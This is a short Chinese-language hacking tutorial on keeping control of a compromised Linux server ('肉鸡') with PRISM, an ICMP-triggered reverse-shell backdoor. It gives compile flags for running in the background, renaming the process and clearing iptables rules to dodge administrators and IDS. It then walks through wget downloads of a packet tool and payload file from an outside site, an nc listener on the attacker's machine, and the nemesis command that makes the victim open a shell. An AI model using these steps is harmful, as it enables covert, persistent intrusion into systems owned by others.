Linux下ICMP反弹后门

0x00概述
当你成功得到一台linux的root权限你是否很兴奋？那么如何保住你的肉鸡？装后门，装rookit？Backdoor是常用了，那么为了应对一些比较细心的管理我们就要小心了。最近遇到内网的一太Linux肉鸡对外没有开放ssh，通过利用端口复用并结合本文介绍这款工具实现了控制该肉鸡。本文给大家介绍一款基于ping的ICMP后门-PRISM。
 
 0x01简介
PRISM是一段反弹的后门程序，它能够工作在两种模式，即ICMP模式和STATIC模式。今天我们主要描述的是ICMP的模式，因为这种模式很方便我们使用，对于绕过防火墙等一些IDS拦截有很大的方便。它有多个优点，包括：
(1)支持两种操作模式（ICMP、STATIC）
(2)支持运行时的进程名重命名
(3)没有监听的端口
(4)自动尝试清除iptables的规则
(5)采用纯c编写，没有任何库依赖
(6)采用了服务器上下载prism的源码到你肉鸡(当然如果你的肉鸡不支持gcc或者没权限，可以本地编译好传上去)，通过gcc添加参数-DDETACH进行编译，表示要编译一个后台运行的后门，默认是ICMP模式，不需要设置。它还支持一下参数的编译：
-DDETACH#后台运行
-DSTATIC#启动STATIC模式
-DNORENAME#不修改进程名，按文档中配置
-DIPTABLES#尝试清除iptables防火墙的规则,这一项建议也编译进去
Ok，编译就简单说这一些，后门运行./door就可以运行了。
 
0x03实战应用
完成了编译，接下来我们看看如何连接你的后门。这将是一个非常隐蔽的方式。
使用前你必须配置一个文件payload.bin文件，里面内容格式如下
[SECURITY_KEY][ATTACKOR_IP][ATTACKOR_PORT]
第一个是在上面配置的密码，第二个是攻击者的IP，第三个是攻击者的监听端口，我们在本地利用NC监听端口。03：

我在本地测试，先描述我的环境：
192.168.11.10是攻击者IP地址

5055是攻击者NC的监听端口
192.168.11.8

是被攻击的IP地址
[1]在被攻击ip192.168.11.8上安装我们上面编译好的door
[2]下载一个可以构造ICMP数据包的程序，我推荐nemesis-1.4，安装方法如下：
.bash$wgethttp://www.81sec.com/t/tar/nemesis-1.4.tar.gz
.bash$tarzxvfnemesis-1.4.tar.gz
.bash$cdnemesis-1.4
.bash$./configure
.bash$make
.bash$makeinstall
该工具依赖于libnet包，具体根据不同发行版Linux下载安装即可。
[3]下载payload.bin到nemesis-1.4目录下
.bash$wgethttp://www.81sec.com/t/door/payload.bin
[4]在攻击者IP192.168.11.10上运行nc
.bash$nc–l5055

#TheNConRHEL&Ubuntucommandisn’tsame!
[5]发送ICMP数据包连接被攻击者
nemesisicmp-i8-c0-D192.168.11.10-Ppayload.bin
说明：-D指定攻击者IP，端口和密码都配置在payload.bin中了。其中端口攻击者可以自定义。
整个过程04：
 
好了，本文就这里结束了。有任何问题可以联系LengF[81sec.com]同时期待大家分享自己的思路和工具。
 
0x04资料参考
[1]PRISM：http://www.andreafabrizi.it/?prism
[2]工具：大家自己google吧
[+]nemesis:一个封包程序或者其他也可以
[+]nc:大名鼎鼎的瑞士军刀

 

*